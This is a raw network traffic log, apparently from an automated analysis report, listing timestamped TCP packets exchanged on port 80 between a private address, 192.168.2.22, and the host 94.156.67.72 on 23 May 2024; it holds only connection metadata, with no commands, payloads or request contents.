May 23, 2024 20:21:06.031898975 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.032222033 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.032264948 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.032587051 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.032630920 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.032695055 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.032737970 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.033377886 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.033422947 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.033484936 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.033529043 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.033948898 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.033999920 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.034025908 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.034060001 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.034234047 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.034282923 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.034774065 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.034831047 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.034888983 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.034899950 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.034933090 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.035397053 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.035444975 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.035517931 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.035562038 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.035717964 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.035765886 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.035932064 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.035978079 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.036289930 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.036339998 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.036408901 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.036442995 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.036624908 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.036636114 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.036659956 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.036672115 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.037166119 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.037210941 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.037280083 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.037322998 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.037520885 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.037532091 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.037566900 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.037869930 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.037915945 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.038101912 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.038141012 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.038232088 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.038274050 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.038413048 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.038458109 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.038952112 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.038996935 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.039047003 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.039083958 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.039288044 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.039298058 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.039333105 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.039793968 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.039834976 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.042893887 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.042906046 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.042949915 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.055372000 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.055553913 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.057905912 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.057918072 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.057928085 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.057936907 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.057948112 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.057959080 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.057976007 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.057981968 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.058661938 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.058677912 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.058686972 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.058696032 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.058706045 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.058712959 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.058715105 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.058722973 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.058732033 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.058743000 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.058743000 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.058758974 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.059106112 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.059118032 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.059150934 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.059348106 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.059390068 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.059628963 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.059638023 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.059647083 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.059670925 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.059680939 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.060585976 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.060596943 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.060627937 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.061064005 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.061074018 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.061108112 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.061496019 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.061507940 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.061515093 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.061520100 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.061528921 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.061537027 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.061538935 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.061548948 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.061559916 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.062455893 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.062468052 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.062488079 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.062501907 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.062520981 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.063162088 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.063174009 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.063184977 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.063206911 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.063216925 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.063498020 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.063540936 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.063735008 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.063746929 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.063755989 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.063766956 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.063777924 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.063787937 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.063805103 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.064378023 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.064389944 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.064399958 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.064409971 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.064424038 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.064435005 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.065227985 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.065237999 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.065243006 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.065283060 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.065851927 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.065864086 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.065874100 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.065886974 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.065898895 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.065908909 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.065924883 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.066425085 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.066467047 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.066669941 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.066679955 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.066690922 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.066699982 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.066709042 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.066720009 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.066731930 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.067523956 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.067533970 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.067543030 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.067553043 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.067563057 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.067568064 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.067580938 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.067662001 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.068344116 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.068357944 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.068367958 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.068392992 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.068404913 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.068907022 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.068919897 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.068965912 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.069303989 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.069315910 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.069348097 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.069688082 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.069730997 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.070358038 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.070373058 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.070400000 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.070410013 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.070422888 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.070457935 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.071022987 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.071065903 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.071113110 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.071152925 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.071691036 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.071732998 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.071784019 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.071850061 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.072335005 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.072377920 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.072681904 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.072721958 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.073060989 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.073103905 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.073142052 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.073180914 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.073793888 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.073844910 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.073864937 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.073900938 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.074548006 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.074572086 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.074593067 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.074603081 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.074923038 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.074965000 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.075026035 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.075037003 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.075067043 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.075737953 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.075786114 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.075959921 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.076001883 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.076045036 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.076083899 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.076225996 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.076266050 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.076797009 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.076839924 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.076848984 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.076889038 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.077028990 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.077071905 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.077167034 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.077208042 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.077536106 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.077577114 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.077600002 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.077642918 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.078313112 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.078355074 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.078397989 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.078438044 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.078522921 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.078563929 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.079068899 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.079106092 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.079144955 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.079185009 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.079296112 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.079338074 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.079746962 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.079761028 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.079791069 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.079823017 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.079863071 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.079997063 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.080043077 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.081928968 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.081978083 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.148852110 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.148866892 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.149027109 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.149048090 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.149102926 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.149133921 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.149197102 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.149369001 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.149411917 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.149581909 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.149625063 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.149952888 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.149966955 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.149993896 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.150058985 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.150099993 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.150254011 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.150296926 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.150661945 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.150674105 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.150706053 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.150840044 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.150851011 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.150882959 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.151037931 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.151110888 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.151515961 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.151561022 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.151702881 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.151745081 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.151927948 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.151967049 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.152267933 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.152311087 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.152401924 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.152416945 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.152445078 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.152453899 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.152581930 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.152625084 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.153162003 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.153203011 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.153275013 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.153316975 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.153471947 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.153512955 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.153656960 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.153697968 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.154048920 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.154093027 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.154179096 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.154218912 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.154432058 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.154475927 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.154925108 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.154937029 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.154972076 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.155025005 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.155062914 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.155250072 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.155260086 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.155292988 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.155798912 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.155843019 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.155932903 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.155972958 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.156128883 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.156141043 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.156172037 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.156501055 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.156542063 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.156667948 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.156706095 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.156773090 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.156814098 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.156941891 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.156985044 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.157593966 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.157644033 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.157669067 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.157707930 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.157857895 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.157867908 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.157900095 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.158463955 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.158514977 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.158550978 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.158562899 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.158593893 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.158771038 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.158814907 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.159307003 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.159349918 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.159410000 CEST	80	49169	94.156.67.72	192.168.2.22
